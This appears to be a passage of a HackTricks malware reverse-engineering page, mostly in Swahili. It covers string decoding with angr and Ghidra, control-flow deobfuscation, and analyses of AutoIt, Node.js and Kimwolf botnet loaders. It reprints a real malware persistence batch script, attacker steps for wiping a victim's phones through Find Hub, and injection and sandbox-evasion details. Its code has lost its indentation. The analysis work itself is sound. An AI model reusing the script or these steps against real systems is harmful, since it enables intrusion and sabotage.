project = angr.Project( ‘/path/to/libtarget.so’, load_options={‘main_opts’: {‘base_addr’: 0x00100000}}, auto_load_libs=False, )

ENCODING_FUNC_ADDR = 0x00100e10 # decoder function discovered in Ghidra

def decode_string(enc_addr, length):

fresh blank state per evaluation

st = project.factory.blank_state() outbuf = st.heap.allocate(length) call = project.factory.callable(ENCODING_FUNC_ADDR, base_state=st) ret_ptr = call(enc_addr, outbuf, length) # returns outbuf pointer rs = call.result_state raw = rs.solver.eval(rs.memory.load(ret_ptr, length), cast_to=bytes) return raw.split(b’\x00’, 1)[0].decode(‘utf-8’, errors=‘ignore’)

Example: decode a JNI signature at 0x100933 of length 5 → should be ()[B

print(decode_string(0x00100933, 5))

</details>

- Kwa kiwango kikubwa, tengeneza ramani thabiti ya call sites kwa ajili ya arguments za decoder (encoded_ptr, size). Wrappers zinaweza kuficha arguments, hivyo unaweza kuunda ramani hii kwa mikono kutoka kwa Ghidra xrefs ikiwa API recovery inatoa matokeo yenye kelele.

<details>
<summary>Fanya decode kwa kundi ya call sites nyingi kwa kutumia angr</summary>
```python
# call_site -> (encoded_addr, size)
call_site_args_map = {
0x00100f8c: (0x00100b81, 0x41),
0x00100fa8: (0x00100bca, 0x04),
0x00100fcc: (0x001007a0, 0x41),
0x00100fe8: (0x00100933, 0x05),
0x0010100c: (0x00100c62, 0x41),
0x00101028: (0x00100c15, 0x16),
0x00101050: (0x00100a49, 0x101),
0x00100cf4: (0x00100821, 0x11),
0x00101170: (0x00100940, 0x101),
0x001011cc: (0x0010084e, 0x13),
0x00101334: (0x001007e9, 0x0f),
0x00101478: (0x0010087d, 0x15),
0x001014f8: (0x00100800, 0x19),
0x001015e8: (0x001008e6, 0x27),
0x0010160c: (0x00100c33, 0x13),
}

decoded_map = { hex(cs): decode_string(enc, sz)
for cs, (enc, sz) in call_site_args_map.items() }

import json
print(json.dumps(decoded_map, indent=2))
with open('decoded_strings.json', 'w') as f:
json.dump(decoded_map, f, indent=2)

Ask for the JSON produced by the angr script

f = askFile(‘Select decoded_strings.json’, ‘Load’) mapping = json.load(open(f.absolutePath, ‘r’)) # keys as hex strings

fm = currentProgram.getFunctionManager() rm = currentProgram.getReferenceManager()

Replace with your decoder address to locate call-xrefs (optional)

ENCODING_FUNC_ADDR = 0x00100e10 enc_addr = toAddr(ENCODING_FUNC_ADDR)

callsite_to_fn = {} for ref in rm.getReferencesTo(enc_addr): if ref.getReferenceType().isCall(): from_addr = ref.getFromAddress() fn = fm.getFunctionContaining(from_addr) if fn: callsite_to_fn[from_addr.getOffset()] = fn.getName()

Write comments from JSON

for k_hex, s in mapping.items(): cs = int(k_hex, 16) site = toAddr(cs) caller = callsite_to_fn.get(cs, None) text = s if caller is None else ‘%s @ %s’ % (s, caller) currentProgram.getListing().setComment(site, CodeUnit.PRE_COMMENT, text) print(‘[+] Annotated %d call sites’ % len(mapping))

</details>

Option B: Script moja ya CPython kwa kutumia pyhidra/ghidra_bridge
- Mbali na hilo, tumia pyhidra au ghidra_bridge kuendesha API ya Ghidra kutoka mchakato ule ule wa CPython unaoendesha angr. Hii inaruhusu kupiga simu decode_string() na kuweka PRE_COMMENTs mara moja bila faili la mpito. Mantiki inafanana na script ya Jython: jenga ramani ya callsite→function kupitia ReferenceManager, decode kwa kutumia angr, na weka maoni.

Why this works and when to use it
- Uendeshaji wa offline unaepuka RASP/anti-debug: hakuna ptrace, hakuna Frida hooks zinazohitajika ili kurejesha strings.
- Kuweka Ghidra na angr base_addr zikiwa zimepangwa sawa (mfano, 0x00100000) huhakikisha kuwa anwani za function/data zinafanana kati ya zana.
- Recipe inayorudiwa kwa decoders: zingatia transform kama function safi, toa output buffer katika state safi, itaje kwa (encoded_ptr, out_ptr, len), kisha concretize kupitia state.solver.eval na changanua C-strings hadi \x00.

Notes and pitfalls
- Heshimu ABI/mkutano wa kupiga simu wa lengo. angr.factory.callable huchagua moja kulingana na arch; ikiwa argumenti zinaonekana kusogezwa, bainisha cc waziwazi.
- Ikiwa decoder inatarajia output buffers zilizosetwa kuwa zero, anzisha outbuf na zeros katika state kabla ya wito.
- Kwa Android .so zisizo tegemea nafasi (position-independent), daima toa base_addr ili anwani katika angr ziendane na zilizoonekana katika Ghidra.
- Tumia currentProgram.getReferenceManager() kuorodhesha call-xrefs hata kama app inafunika decoder nyuma ya thin stubs.

For angr basics, see: [angr basics](../../reversing/reversing-tools-basic-methods/angr/README.md)

---

## Kuondoa ufifishaji wa Dynamic Control-Flow (JMP/CALL RAX Dispatchers)

Familia za kisasa za malware zinatumia sana ufifishaji wa Control-Flow Graph (CFG): badala ya jump/call ya moja kwa moja huchanganua marudio wakati wa utekelezaji na kutekeleza `jmp rax` au `call rax`. *dispatcher* mdogo (kwa kawaida maagizo tisa) huweka lengo la mwisho kulingana na bendera za CPU `ZF`/`CF`, na kuvunja kabisa urejeshaji wa CFG wa static.

Mbinu hii — iliyowasilishwa na loader ya SLOW#TEMPEST — inaweza kushindwa kwa mtiririko wa kazi wa hatua tatu unaotegemea tu IDAPython na Unicorn CPU emulator.

### 1. Locate every indirect jump / call
```python
import idautils, idc

for ea in idautils.FunctionItems(idc.here()):
mnem = idc.print_insn_mnem(ea)
if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
print(f"[+] Dispatcher found @ {ea:X}")

2. Toa dispatcher byte-code

import idc

def get_dispatcher_start(jmp_ea, count=9):
s = jmp_ea
for _ in range(count):
s = idc.prev_head(s, 0)
return s

start = get_dispatcher_start(jmp_ea)
size  = jmp_ea + idc.get_item_size(jmp_ea) - start
code  = idc.get_bytes(start, size)
open(f"{start:X}.bin", "wb").write(code)

3. Iiga mara mbili kwa kutumia Unicorn

from unicorn import *
from unicorn.x86_const import *
import struct

def run(code, zf=0, cf=0):
BASE = 0x1000
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(BASE, 0x1000)
mu.mem_write(BASE, code)
mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)
mu.reg_write(UC_X86_REG_RAX, 0)
mu.emu_start(BASE, BASE+len(code))
return mu.reg_read(UC_X86_REG_RAX)

Endesha run(code,0,0) na run(code,1,1) ili kupata malengo ya tawi la false na la true.

4. Rekebisha direct jump / call

import struct, ida_bytes

def patch_direct(ea, target, is_call=False):
op   = 0xE8 if is_call else 0xE9           # CALL rel32 or JMP rel32
disp = target - (ea + 5) & 0xFFFFFFFF
ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))

Baada ya patching, lazimisha IDA ifanye upya uchambuzi wa function ili CFG kamili na Hex-Rays output virejeshwe:

import ida_auto, idaapi
idaapi.reanalyze_function(idc.get_func_attr(ea, idc.FUNCATTR_START))

5. Weka lebo kwa miito isiyo ya moja kwa moja ya API

Mara tu mahali halisi pa kila call rax unapojulikana unaweza kumueleza IDA ni nini ili parameter types & variable names zirejeshwe kiotomatiki:

idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+

Faida za vitendo

• Inarudisha CFG halisi → decompilation inakwenda kutoka 10 mistari hadi maelfu.
• Inawezesha string-cross-reference & xrefs, kufanya ujenzi upya wa tabia kuwa rahisi sana.
• Scripts zinaweza kutumika tena: ziweke tu kwenye loader yoyote iliyo na ulinzi wa ujanja ule.

AutoIt-based loaders: .a3x decryption, Task Scheduler masquerade and RAT injection

Mfumo huu wa uvamizi unaunganisha MSI iliyo saini, AutoIt loaders zilizokompailiwa kuwa .a3x, na kazi ya Task Scheduler inayojifanya kuwa app isiyo hatari.

MSI → vitendo maalum → AutoIt orchestrator

Mti wa mchakato na amri zinazotekelezwa na vitendo maalum vya MSI:

• MsiExec.exe → cmd.exe kuendesha install.bat
• WScript.exe ili kuonyesha dirisha la kosa la uongo

%SystemRoot%\system32\cmd.exe /c %APPDATA%\스트레스 클리어\install.bat
%SystemRoot%\System32\WScript.exe %APPDATA%\스트레스 클리어\error.vbs

install.bat (huweka loader, inaweka persistence, inajisafisha):

@echo off
set dr=Music

copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe
copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3

cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe ^
& hwpviewer /delete /tn "IoKlTr" /f ^
& hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3"

del /f /q "%~dp0AutoIt3.exe"
del /f /q "%~dp0IoKlTr.au3"
del /f /q "%~f0"

error.vbs (kivutio cha mtumiaji):

MsgBox "현재 시스템 언어팩과 프로그램 언어팩이 호환되지 않아 실행할 수 없습니다." & vbCrLf & _
"설정에서 한국어(대한민국) 언어팩을 설치하거나 변경한 뒤 다시 실행해 주세요.", _
vbCritical, "언어팩 오류"

Key artifacts and masquerade:

• Inaweka AutoIt3.exe na IoKlTr.au3 hadi C:\Users\Public\Music
• Inakopa schtasks.exe kuwa hwpviewer.exe (inaiga Hangul Word Processor viewer)
• Inaunda scheduled task “IoKlTr” ambayo inaendeshwa kila dakika 1
• Startup LNK inaonekana kama Smart_Web.lnk; mutex: Global\AB732E15-D8DD-87A1-7464-CE6698819E701
• Inastage modules chini ya %APPDATA%\Google\Browser\ subfolders zenye adb au adv na kuanza via autoit.vbs/install.bat helpers

Forensic triage tips:

• schtasks enumeration: schtasks /query /fo LIST /v | findstr /i "IoKlTr hwpviewer"
• Angalia nakala zilizopewa majina mapya za schtasks.exe zilizoambatana na Task XML: dir /a "C:\Users\Public\Music\hwpviewer.exe"
• Njia za kawaida: C:\Users\Public\Music\AutoIt3.exe, ...\IoKlTr.au3, Startup Smart_Web.lnk, %APPDATA%\Google\Browser\(adb|adv)*
• Linganisha uundaji wa process: AutoIt3.exe ikizaa legitimate Windows binaries (mfano, cleanmgr.exe, hncfinder.exe)

AutoIt loaders and .a3x payload decryption → injection

• AutoIt modules zimecompiled na #AutoIt3Wrapper_Outfile_type=a3x na zindecrypt embedded payloads kabla ya kuinject kwenye benign processes.
• Familia zilizobainika: QuasarRAT (ila injected into hncfinder.exe) na RftRAT/RFTServer (ila injected into cleanmgr.exe), pamoja na RemcosRAT modules (Remcos\RunBinary.a3x).
• Decryption pattern: tengeneza AES key kupitia HMAC, decrypt embedded blob, kisha inject module ya plaintext.

Generic decryption skeleton (exact HMAC input/algorithm is family-specific):

import hmac, hashlib
from Crypto.Cipher import AES

def derive_aes_key(secret: bytes, data: bytes) -> bytes:
# Example: HMAC-SHA256 → first 16/32 bytes as AES key
return hmac.new(secret, data, hashlib.sha256).digest()

def aes_decrypt_cbc(key: bytes, iv: bytes, ct: bytes) -> bytes:
return AES.new(key, AES.MODE_CBC, iv=iv).decrypt(ct)

Mtiririko wa kawaida wa injection (CreateRemoteThread-style):

• CreateProcess (suspended) ya host lengwa (mfano, cleanmgr.exe)
• VirtualAllocEx + WriteProcessMemory na module/shellcode iliyofichuliwa
• CreateRemoteThread au QueueUserAPC kutekeleza payload

Mawazo ya kutafuta

• AutoIt3.exe ikiwa mzazi wake ni MsiExec.exe au WScript.exe ikizalisha zana za mfumo
• Faili zenye extension .a3x au AutoIt script runners chini ya paths zinazoweza kuandikwa na umma/mtumiaji
• Kazi zilizopangwa zenye shuku zinazotekeleza AutoIt3.exe au binaries zisizosainiwa na Microsoft, zikiwa na vichocheo vya kila dakika

Matumizi mabaya ya kuchukua akaunti ya Android Find My Device (Find Hub)

Wakati wa uvamizi wa Windows, wahalifu walitumia nywila za Google zilizoporwa kufuta mara kwa mara vifaa vya Android vya mwathiri, wakizima taarifa za tahadhari wakati walipoongeza upatikanaji kupitia messenger ya desktop iliyokuwa imeingia.

Hatua za operator (kutoka kwenye kikao cha kivinjari kilichoingia):

• Kagua Google Account → Security → Your devices; fuata Find My Phone → Find Hub (https://www.google.com/android/find)
• Chagua device → ingiza tena nenosiri la Google → toa amri “Erase device” (factory reset); rudia ili kuchelewesha urejeshaji
• Hiari: safisha barua pepe za tahadhari katika sanduku la barua linalohusishwa (mfano, Naver) ili kuficha arifa za usalama

Kufuata loaders za Node.js zilizofichwa kwa kina

Washambuliaji mara nyingi wamebana JavaScript loaders ndani ya standalone Windows binaries zilizocompiled na nexe, hivyo runtime huambatana na script. PE inayotokana mara nyingi ina saizi ya 60–90 MB na inatekelezwa hata kama Node.js haijawekwa. Wakati wa uchambuzi wa awali:

• Tumia nexe_unpacker kuchonga JavaScript iliyojazwa ndani ya PE na kuipeleka kwa zana za ndani kwa static diffing.
• Tarajia mutex inayotegemea diski katika %TEMP% (GachiLoader huwaacha faili ya <name>.lock isiyopangwa ambayo inaisha baada ya ~5 minutes). Kuikopa faili hiyo kwenda sandbox kabla ya utekelezaji kunakuwezesha kuruka hatua zinazorudiwa huku ukibaki kuona payloads za baadaye.

Kufuata API za Node.js kukabiliana na anti-analysis

Check Point’s Nodejs-Tracer inahook core modules ndani ya mchakato wowote wa Node.js, inakuwezesha kuudanganya probes za anti-VM, na huhifadhi kila artifact sample inaandika. Anzisha scripts zilizofichwa kupitia tracer ili instrumentation inayodhibitiwa na mchambuzi ibaki ndani ya call stack:

node -r .\tracer.js main.js

Key configuration toggles inside tracer.js allow you to:

• Rekodi shughuli za filesystem, child-process, na HTTP (LOG_HTTP_REQUESTS, SAVE_FILE_WRITES). Kila faili inayodondolewa—kama kidkadi.node—inakopiwa kwenye working directory kabla malware kuuifuta.
• Override environment fingerprints kwa kurudisha counts za RAM/CPU zinazoweza kuonekana halisi, fake tasklist output, na kuingilia majibu ya PowerShell/WMI. Hii inaepusha loaders zinazodai ≥4 GB RAM, ≥2 cores, na kuchunguza majina ya watumiaji (mashinesssss, wdagutilityaccount, etc.), hostnames (desktop-vrsqlag, server1 …), na majina ya process (vmtoolsd.exe, fiddler.exe, x64dbg.exe, frida-server.exe).
• Neuter WMI hardware checks kama Get-WmiObject Win32_DiskDrive (kutafuta vmware, kvm, virtio, …), Win32_VideoController (kuzuia “VirtualBox Graphics Adapter”, “Hyper-V Video”, etc.) na counts za Win32_PortConnector. Wakati probes hizo zinaporipoti vifaa “halisi”, sandboxes hazibatwi tena na loop isiyo na mwisho ya wito za benign Invoke-WebRequest kwa linkedin.com, grok.com, whatsapp.com, na domain nyingine sawa ambazo GachiLoader hutumia kupoteza muda wa uchambuzi.

Capturing gated C2 traffic automatically

Network hooks za tracer zinafunua multi-layer C2 authentication bila reversing the JavaScript obfuscation. Katika campaign iliyoshuhudiwa loader:

1. POSTs host telemetry to /log on each hard-coded C2.
2. Issues GET /richfamily/<per-sample key> with X-Secret: gachifamily to retrieve a Base64-encoded payload URL.
3. Performs a final GET to that URL with a long per-sample X-Secret header; missing it returns 403 Forbidden.

Kwa sababu tracer inarekodi maombi kamili (headers, bodies, destinations), unaweza kuirudia trafiki ile ile ili kuvuta payloads, dump Themida/VMProtect shells katika memory, na kutoa data za configuration za Rhadamanthys kwa wingi.

AdaptixC2: Uchimbaji wa Usanidi na TTPs

See the dedicated page:

Adaptixc2 Config Extraction And Ttps

Kimwolf Android Botnet Tradecraft

APK loader & native ELF execution on TV boxes

• Malicious APKs such as com.n2.systemservice06* ship a statically linked ARM ELF inside res/raw (e.g. R.raw.libniggakernel). A BOOT_COMPLETED receiver runs at startup, extracts the raw resource to the app sandbox (e.g. /data/data/<pkg>/niggakernel), makes it executable and invokes it with su.
• Many Android TV boxes/tablets ship pre-rooted images or world-writable su, so the loader reliably boots the ELF with UID 0 even without an exploit chain. Persistence comes “for free” because the receiver relaunches after every reboot or app restart.
• Reverse engineers hunting for this pattern can diff AndroidManifest.xml for hidden boot receivers plus code that references Resources.openRawResource → FileOutputStream → Runtime.getRuntime().exec("su"). Once the ELF is dropped, triage it as a Linux userland backdoor (Kimwolf is UPX-packed, stripped, statically linked, 32-bit ARM EABI5).

Runtime mutexes & masquerading IOCs

• Upon start, Kimwolf binds an abstract UNIX domain socket such as @niggaboxv4/@niggaboxv5. Existing sockets force an exit, so the socket name works as both a mutex and a forensic artifact.
• The process title is overwritten with service-looking names (netd_services, tv_helper, etc.) to blend into Android process listings. Host-based detections can alert on these names combined with the mutex socket.

Stack XOR string decoding with ARM NEON + flare_emu

• Sensitive strings (C2 domains, resolvers, DoT endpoints) are pushed onto the stack in encrypted 8-byte blocks and decoded in-place via VEOR Qx, Qx, Qy (veorq_s64). Analysts can script flare_emu to catch the decrypted pointer each time the decryptor hands it to the caller:

import flare_emu

eh = flare_emu.EmuHelper()

def hook(eh, addr, argv, _):
if eh.isValidEmuPtr(argv[1]):
print(hex(addr), eh.getEmuString(argv[1]))

eh.iterate(0x8F00, hook)  # sub_8F00 consumes the plaintext R1 argument

• Kutafuta VEOR Q8, Q8, Q9 / veorq_s64 sequences na kuiga ranges zao kunatoa kwa wingi kila decrypted string, ikiepuka stack-only lifetime ya plaintext.

DNS-over-TLS utatuzi pamoja na XOR IP derivation

• All Kimwolf variants resolve C2 domains by speaking DNS-over-TLS (TCP/853) directly with Google (8.8.8.8) or Cloudflare (1.1.1.1), zikizuia plain DNS logging au hijacking.
• v4 bots zinatumia tu rekodi ya A ya IPv4 iliyorudishwa. v5 bots hutumia rekodi ya A kama integer ya 32-bit, badilisha endianness yake, XOR na constant 0x00ce0491, kisha rejesha endianness kupata C2 IP halisi. CyberChef recipe: Change IP format → swap endianness per 4-byte chunk → XOR with 00 ce 04 91 → convert back to dotted decimal.

ENS / EtherHiding mbadala

• Majengo ya baadaye yanaongeza domain ya ENS (pawsatyou.eth) ambapo resolver text key "lol" inahifadhi IPv6 inayoonekana isiyo hatari (fed0:5dec:...:1be7:8599).
• Bot inachukua bytes nne za mwisho (1b e7 85 99), inafanya XOR nao na 0x93141715, na kutafsiri matokeo kama IPv4 C2 (136.243.146.140). Kusasisha rekodi ya text ya ENS hurusha mzunguko wa C2 za chini kupitia blockchain mara moja bila kugusa DNS.

TLS + ECDSA chaneli ya amri iliyothibitishwa

• Trafiki imefumbwa ndani ya wolfSSL kwa custom framed protocol:

struct Header {
Magic    [4]byte // e.g. "DPRK", "FD9177FF", "AD216CD4"
Reserved uint8   // 0x01
MsgType  uint8   // verb
MsgID    uint32
BodyLen  uint32
CRC32    uint32
}

• Bootstrap: bot inatuma vichwa viwili wazi vya MsgType=0 (register). C2 inajibu na MsgType=1 (verify) inayobeba changamoto ya nasibu pamoja na saini ya ASN.1 DER ECDSA. Bots zinaihakiki dhidi ya blob ya SubjectPublicKeyInfo iliyojengwa ndani; kushindwa kunavunja kikao, na hivyo kuzuia node za C2 zilizotekwa/sinkholed kupewa kazi kwa fleet.
• Baada ya kuthibitishwa, bot inatuma mwili wa MsgType=0 unaobeba group string iliyowekwa na operator (mfano android-postboot-rt). Ikiwa group imewezeshwa, C2 inajibu na MsgType=2 (confirm), kisha ugawaji wa kazi (MsgType 5–12) unaanza.
• Verbs zinazoungwa mkono ni pamoja na SOCKS-style TCP/UDP proxying (residential proxy monetization), reverse shell / single command exec, kusoma/kuandika faili, na mizigo ya Mirai-compatible DDoSBody (mpangilio sawa wa AtkType, Duration, Targets[], Flags[] layout).

References

• Unit42 – Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
• SoTap: Lightweight in-app JNI (.so) behavior logger – github.com/RezaArbabBot/SoTap
• Strategies for Analyzing Native Code in Android Applications: Combining Ghidra and Symbolic Execution for Code Decryption and Deobfuscation – revflash.medium.com
• Ghidra – github.com/NationalSecurityAgency/ghidra
• angr – angr.io
• JNI_OnLoad and invocation API – docs.oracle.com
• RegisterNatives – docs.oracle.com
• Tracing JNI Functions – valsamaras.medium.com
• Native Enrich: Scripting Ghidra and Frida to discover hidden JNI functions – laripping.com
• Unit42 – AdaptixC2: A New Open-Source Framework Leveraged in Real-World Attacks
• KONNI-linked APT abuses Google Find Hub to wipe Android devices after Windows intrusion – genians.co.kr
• Android Find My Device (Find Hub) – google.com/android/find
• RftRAT/RFTServer technical analysis – asec.ahnlab.com
• HMAC background – wikipedia.org/wiki/HMAC
• Kimwolf Android TV Botnet: ENS-Based C2 Evasion, TLS+ECDSA C2 Protocol, and Large-Scale Proxy/DDoS Operations – blog.xlab.qianxin.com
• Check Point Research – GachiLoader: Defeating Node.js Malware with API Tracing
• Nodejs-Tracer – GitHub

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.